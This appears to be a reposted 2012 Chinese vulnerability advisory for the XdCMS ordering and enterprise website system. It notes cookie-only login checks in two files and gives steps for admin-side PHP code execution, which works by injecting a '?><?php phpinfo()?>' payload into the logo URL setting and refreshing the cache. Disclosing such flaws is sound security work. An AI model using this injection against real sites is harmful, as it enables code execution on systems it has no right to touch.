热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

XdCMS 外卖、订餐、企业网站系统多处漏洞

发布时间:2012-08-15 08:53文章来源:网络文章作者:王大随性 点击次数:
摘要:发布日期:2012-08.15 发布作者:王大随性 漏洞类型:代码执行 漏洞描述: 漏洞文件1: System/modeules/member/login.php if(empty($_COOKIE['member_user'])||empty($_COOKIE['member_userid']))//只判断Cookie是否存在 漏洞文件2:system/libs/base.class.p...

发布日期:2012-08.15
发布作者:王大随性

漏洞类型:代码执行

漏洞描述:

漏洞文件1: System/modeules/member/login.php

  1. if(empty($_COOKIE['member_user'])||empty($_COOKIE['member_userid'])) //只判断Cookie是否存在 

漏洞文件2:system/libs/base.class.php

 

  1. if( empty($_COOKIE['member_user'])|| empty($_COOKIE['member_userid'])){ //只判断Cookie 
  2.  
  3. Sysplugins\smarty_internal_compile_include.php 

参数$include_file 存在问题 在.

 

漏洞证明:

后台2次利用执行代码

1.访问//index.php?m=xdcms&c=setting

2.在 网站LOGO地址:填写”');?><?php phpinfo()?> <?php $_config=array ( 'logourl' => '”

3.点击 后台首页-->>常用操作-->>更新全站缓存 刷新即可执行 刚才添加的php代码

 

标签分类:

上一篇:HDwiki各版本新漏洞补丁包2012-08-09后门分析
下一篇:汇成装潢行业企业网站系统vII2.1注入漏洞利用